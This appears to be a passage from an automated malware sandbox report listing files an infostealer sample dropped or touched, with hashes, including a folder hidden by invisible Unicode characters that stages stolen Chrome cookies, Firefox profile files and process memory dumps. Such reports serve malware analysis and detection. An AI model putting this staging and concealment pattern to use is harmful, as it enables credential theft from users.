073f8e682d2468bfe7d55b82cf0ff5dafd2754da2813de2116551e2811809debba7f06c5d8ed5901a59703bfb306fd5fd05d9d1e797bf9e7887826709c6993c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍‏‎   \Credentials\Chrome\Chrome Cookies.txt

Filesize
258B

MD5
940d4b2d128d307325f265926da6b62a

SHA1
ff94a762633e00122987291215695019c670a406

SHA256
70420f8124988659744f5301124baa05431008f248725d2d07078cdb2ea33c6d

SHA512
e9059e9bf1f120f5f0354d97aabbc55281554278d3d0873e6606bb95b464b4de60065e38e78b87d3eb4527e390284d818adc7394bb34006890ac138ad1fe0223

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ld3ilkk.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
cc6c030735abb45d948890d0f1f5880b

SHA1
ecb6b57487a79886e0defef10e593fb379c3d063

SHA256
cee5b0ae70f8485dc0cca0bcec793c1b494fb8d70a04181861b13765a2d2a685

SHA512
c5b631a7baa96e8817fac159e42def6c72471a249ffe5fc6feca8974707967ea76bf0089a753a51bad6b3b9a6d1e13845e762350341bb298ec66838846156826

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ld3ilkk.default-release\datareporting\glean\db\data.safe.tmp

Filesize
16KB

MD5
14485467533f011c263bb269814c04da

SHA1
3962e43a43e5faa985bec677be76ee51fd913353

SHA256
907e5577db78eb0a53ed73edad39e911589d7e52fb52972093f89dbe011d007d

SHA512
eeab8014b73a5ad065d787d7c49a4fb61b26c52e4b6c4ed58791131695322eb68fccda5b91ce1c93d8917647c961778b0ed2e1e77e0c0682f8fe4d08b004b01e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ld3ilkk.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
cff563a259940a243cf08d7cac8b9199

SHA1
704a9dac97ab649d9dab680ad6833385ba4cd023

SHA256
a2a072d46c77c0e8f1c33ab389dc5527e4d26bb4e345ca67f24d5ac9fe534441

SHA512
23de7ca4f8abefdda26462415a14a145ab6be5898ca7bc150d4a60b548b4c7657b55d0ee0097e5025149c237165e0398cb3a442d290b738f59ea3cf042df952e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ld3ilkk.default-release\datareporting\glean\pending_pings\58c95c41-a6f8-433c-a7a8-352a3090d845

Filesize
982B

MD5
d376975e668438ae0001db24c78769f6

SHA1
d7d09fdf7b26395d75c16ae8bc3f56469f320311

SHA256
5c588ac0352c4a0df6d750570066b682a18d23850a1113e58c8ec3ca55b1a962

SHA512
83f8609ddce18bb6737e41208d93fc65240b96529d503e79a2c97de03ccb96729b2685d9abb22a7a10eef2abd8563efb32c53cd01056551e2ca1ec4c37120f1a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ld3ilkk.default-release\datareporting\glean\pending_pings\d11524ec-a7f3-4782-8dbd-0fc2b17d815f

Filesize
671B

MD5
44a7e427392470aea6de1b64ef963637

SHA1
0fa244aae9458ffb300f4791d2157971dfd2ee19

SHA256
31e11cfb307ed296787b2d474fbd0d966ced9b007fba8309ae518b264cc115db

SHA512
e7b3c69385f0a2ac4b62d68d608c813c6a81bbc0d5ffad343129c7b4ee85529318fdea378766b1a2952188476bbe8267f5b9ca27ac054abe4efd1269a00572e9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ld3ilkk.default-release\datareporting\glean\pending_pings\e758db4c-2844-48f8-97fe-98cca8ee3f96

Filesize
27KB

MD5
150cfa6476101a79105498b0b60ffba5

SHA1
a1aba155f7246accd0209625b2b198af3e7365c8

SHA256
a7d241d5460a319f2dd99141e27fc5e0deb9579e97136977c221c81c08973627

SHA512
8985715c8bcdb6a23030d8a53a8804056fa6a3aebdad39b77b677becaffa0894bece6c1af2c1b52620260051c08b8b21a1af134e32592e0614e7d9be5ef7db31

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4ld3ilkk.default-release\prefs-1.js

Filesize
10KB

MD5
43dce2938253ce8337c53b61d799bb3d

SHA1
e5d4133e7c64a4014021e737754de594a2e81d15

SHA256
fd92f3b14baed9991d0eca7feca6642985d17d13455cabe9debb4d73da1ab689

SHA512
30263d0b4d3f8339022d4c1d2779eef81eae31835e17c511b3f9d2049f972778ad9c7155fe4fcb395cbc67ac1a8a08e393da4eb75130958c6ad16846d13d26aa

Download Submit
memory/2504-95-0x000001B6D3FC0000-0x000001B6D3FE2000-memory.dmp

Filesize
136KB

Download
memory/2548-240-0x00007FF65E000000-0x00007FF65E02B000-memory.dmp

Filesize
172KB

Download
memory/4912-68-0x00007FFCC8050000-0x00007FFCC807E000-memory.dmp

Filesize
184KB

Download
memory/4912-207-0x00007FF65E000000-0x00007FF65E02B000-memory.dmp

Filesize
172KB

Download
memory/4912-62-0x00007FFCC8260000-0x00007FFCC8283000-memory.dmp

Filesize
140KB

Download
memory/4912-237-0x00007FFCC8050000-0x00007FFCC807E000-memory.dmp

Filesize
184KB

Download
memory/4912-236-0x00007FFCD5EE0000-0x00007FFCD5EED000-memory.dmp

Filesize
52KB

Download
memory/4912-235-0x00007FFCC8240000-0x00007FFCC8259000-memory.dmp

Filesize
100KB

Download
memory/4912-234-0x00007FFCBF610000-0x00007FFCBF72C000-memory.dmp

Filesize
1.1MB

Download
memory/4912-233-0x00007FFCD5ED0000-0x00007FFCD5EDD000-memory.dmp

Filesize
52KB

Download
memory/4912-232-0x00007FFCC8090000-0x00007FFCC80A4000-memory.dmp

Filesize
80KB

Download
memory/4912-231-0x00007FFCBE980000-0x00007FFCBECF8000-memory.dmp

Filesize
3.5MB

Download
memory/4912-229-0x00007FFCBEDC0000-0x00007FFCBEF37000-memory.dmp

Filesize
1.5MB

Download
memory/4912-228-0x00007FFCCEC10000-0x00007FFCCEC29000-memory.dmp

Filesize
100KB

Download
memory/4912-227-0x00007FFCCEEB0000-0x00007FFCCEEDD000-memory.dmp

Filesize
180KB

Download
memory/4912-226-0x00007FFCD8390000-0x00007FFCD839F000-memory.dmp

Filesize
60KB

Download
memory/4912-225-0x00007FFCCF0C0000-0x00007FFCCF0E3000-memory.dmp

Filesize
140KB

Download
memory/4912-224-0x00007FFCC8260000-0x00007FFCC8283000-memory.dmp

Filesize
140KB

Download
memory/4912-208-0x00007FFCBF730000-0x00007FFCBFD19000-memory.dmp

Filesize
5.9MB

Download
memory/4912-230-0x000001E031BE0000-0x000001E031F58000-memory.dmp

Filesize
3.5MB

Download
memory/4912-218-0x00007FFCBED00000-0x00007FFCBEDB8000-memory.dmp

Filesize
736KB

Download
memory/4912-238-0x00007FFCBED00000-0x00007FFCBEDB8000-memory.dmp

Filesize
736KB

Download
memory/4912-60-0x00007FFCCEC10000-0x00007FFCCEC29000-memory.dmp

Filesize
100KB

Download
memory/4912-195-0x00007FFCC8050000-0x00007FFCC807E000-memory.dmp

Filesize
184KB

Download
memory/4912-61-0x00007FFCBEDC0000-0x00007FFCBEF37000-memory.dmp

Filesize
1.5MB

Download
memory/4912-64-0x00007FFCC8240000-0x00007FFCC8259000-memory.dmp

Filesize
100KB

Download
memory/4912-66-0x00007FFCD5EE0000-0x00007FFCD5EED000-memory.dmp

Filesize
52KB

Download
memory/4912-73-0x00007FFCBED00000-0x00007FFCBEDB8000-memory.dmp

Filesize
736KB

Download
memory/4912-56-0x00007FFCCEEB0000-0x00007FFCCEEDD000-memory.dmp

Filesize
180KB

Download
memory/4912-165-0x00007FFCC8240000-0x00007FFCC8259000-memory.dmp

Filesize
100KB

Download
memory/4912-74-0x000001E031BE0000-0x000001E031F58000-memory.dmp

Filesize
3.5MB

Download
memory/4912-75-0x00007FFCBE980000-0x00007FFCBECF8000-memory.dmp

Filesize
3.5MB

Download
memory/4912-148-0x00007FFCC8260000-0x00007FFCC8283000-memory.dmp

Filesize
140KB

Download
memory/4912-118-0x00007FFCBEDC0000-0x00007FFCBEF37000-memory.dmp

Filesize
1.5MB

Download
memory/4912-83-0x00007FFCBF610000-0x00007FFCBF72C000-memory.dmp

Filesize
1.1MB

Download
memory/4912-77-0x00007FFCCF0C0000-0x00007FFCCF0E3000-memory.dmp

Filesize
140KB

Download
memory/4912-78-0x00007FFCC8090000-0x00007FFCC80A4000-memory.dmp

Filesize
80KB

Download
memory/4912-80-0x00007FFCD5ED0000-0x00007FFCD5EDD000-memory.dmp

Filesize
52KB

Download
memory/4912-31-0x00007FFCCF0C0000-0x00007FFCCF0E3000-memory.dmp

Filesize
140KB

Download
memory/4912-33-0x00007FFCD8390000-0x00007FFCD839F000-memory.dmp

Filesize
60KB

Download
memory/4912-72-0x00007FFCBF730000-0x00007FFCBFD19000-memory.dmp

Filesize
5.9MB

Download
memory/4912-26-0x00007FFCBF730000-0x00007FFCBFD19000-memory.dmp

Filesize
5.9MB

Download